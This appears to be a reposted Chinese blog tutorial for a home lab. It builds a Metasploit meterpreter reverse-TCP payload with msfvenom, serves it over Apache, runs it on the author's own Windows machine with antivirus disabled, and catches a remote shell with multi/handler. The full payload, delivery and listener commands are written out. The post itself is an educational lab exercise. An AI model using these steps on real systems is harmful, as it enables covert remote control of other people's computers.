利用msfvenom远程控制

news/2025/3/19 15:02:16/文章来源:https://www.cnblogs.com/liufengwuya/p/18502911

pAwD7Q0.png(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133
构建
`msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.133 lport=5000 -f exe -o /root/payload.exe

先转到/root
然后把这个文件放在apache的网站下

cd /root
`cp payload.exe /var/www/html

启动apache

systemctl start apache2
sysemctl status apache2

我这里用物理机win11登陆

在edge地址栏输入
kali的ip/payload.exe

会弹出一个框让你下载
(注意记得关杀毒软件)

接着在kali里输入
msfconsole
输入下面四条

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.133  # Kali 的 IP 地址
set lport 5000  # 监听的端口
exploit

会显示
pAwDLeU.png
然后再在物理机上运行刚刚下好的payload.exe

此时出现下图说明已经建立好链接
然后输入dir,就会出现物理机上的文件
pAwDOwF.png

输入shell和ipconfig

pAwDXo4.png

并且在kali上输入命令时,物理机不会有提示说正在被监听,正在被远程连接
因此这是很难注意到的危险

将生成的被控端放到网站上检测www.virustotal.com
pAwDvFJ.png

被标记成木马文件了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/821769.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决:AssertionError: Label class 1 exceeds nc=1 in data/coco128.yaml. Possible class labels are 0-0

这个基本上是标签有问题 大概率是标签txt文件内的编号不正确导致的 编号大于nc数就会报这个错误

华企盾【运维利器】PowerShell自动磁盘清理脚本代码

在日常工作中,磁盘空间不足是一个常见且令人头疼的问题。为了解决这一问题,我们可以使用PowerShell编写一个自动磁盘清理脚本。 该脚本旨在监控特定目录(如E: est),并在可用空间低于设定阈值(20%)时自动删除最旧的文件,以确保磁盘空间的有效利用。 脚本的基本逻辑是每分…

我新上线的小程序功能:生日备注

功能作用:记录亲朋好友的生日信息、还有多少天生日、多少岁。 背景:因为记不住亲人的出生日期和多少岁和还有多久生日,用记事本也只能记录一串文字,不是特别方便,所以自己从零开发了这样一个小功能,能帮助自己记录亲人的生日信息。 框架:uniapp、云开发,我的这套框架可…

java第一次到第三次大作业总结

目录: 一、关于面向对象 二、三次大作业设计 ** 2.1相关知识** ** 2.2类图+大作业实现讲解+大作业时序图** 三、三次大作业中踩坑心得 四、修改建议 五、总的心得体悟 一、关于面向对象: 这个学期是我们第一次接触面向对象的这个概念,在接触java之前,我们所用到的基本上都…

摄像机实时接入分析平台视频分析网关烟火检测在校园消防安全场景中的应用

随着人工智能技术的不断进步,视频分析网关烟火检测的应用为校园消防安全带来了巨大变革。通过实时接入摄像机视频流,结合先进的烟火检测算法,这一平台不仅极大地提升了火灾预警的准确性和响应速度,还为校园安全管理提供了一种全新的智能化解决方案。 在校园消防安全场景中,…

CPython逆向实战分析

Python代码转换为C代码的时候,将会大大增加框架代码量。先有正向,再有逆向,写一个简单的pyx文件,.pyx文件是由 Cython 编程语言 “编写”而成的 Python 扩展模块源代码文件。写一个 setup.py文件,使用命令开始编译。Python代码转换为C代码的时候,将会大大增加框架代码量。…

场景题:百万数据插入Redis有哪些实现方案?

在面试的过程当中,偶尔会遇到一些场景题,虽然这些场景题归根到底还是技术问题,但他通常比常规的八股题要稍微难一些,因为他考验的是你对于技术的整体理解、应用,以及变通的能力。 那么今天咱们就来看一道,在面试中国平安时遇到的一道场景题:将百万数据插入到 Redis,有哪…

PbootCMS 404 错误解决方法

对于 PbootCMS 系统,404 错误出现的原因确实通常有以下两种情况:当前栏目调用的页面模板不正确,导致链接不存在:解决方法:进入后台管理,导航至“栏目管理”。 检查各栏目的模板设置,确保每个栏目都正确关联了对应的模板文件。 如果发现有栏目调用了不存在的模板文件,可…

BOS同步后进入应用提示“F_VTR_FORBIDDERID”,“F_VTR_FORBIDDATE无效”

原因: 同步反写规则业务对象未成功创建字段 解决:执行以下脚本 ALTER TABLE T_BF_WRITEBACKRULECUST ADD [F_VTR_FORBIDDERID] [INT] NOT NULL DEFAULT 0ALTER TABLE T_BF_WRITEBACKRULECUST ADD [F_VTR_FORBIDDATE] [DATETIME] NULL

如何在C语言中进行数据加密

## 如何在C语言中进行数据加密 在讨论C语言中的数据加密时,我们首先需要明确两个核心观点:使用加密库、实现自定义加密算法。其中,使用加密库是最直接且高效的方式,因为这允许开发者利用已经广泛测试和验证的加密算法来保护数据的安全性,而无需深入了解加密算法的内部工作…

使用Lucene.net来进行索引和检索

1.去 http://lucenenet.apache.org/ 下载lunece.net 文件 2.在项目添加引用Lucene.Net.dll class Program{static void Main(string[] args){//索引Directory direcotry = FSDirectory.GetDirectory("LuceneIndex");Analyzer analyzer = new StandardAnalyzer();I…

CSS Grid与Flexbox有何不同

CSS Grid与Flexbox的不同点:1. 定位方式不同;2. 维度不同;3. 主轴与交叉轴不同;4. 对齐方式不同;5. 元素排序不同;6. 应用场景不同;7. 自适应性不同等。Flexbox(弹性盒子模型)主要用于一维布局,即在行或列的方向上布局,Grid(网格布局)适用于二维布局,可以同时定义…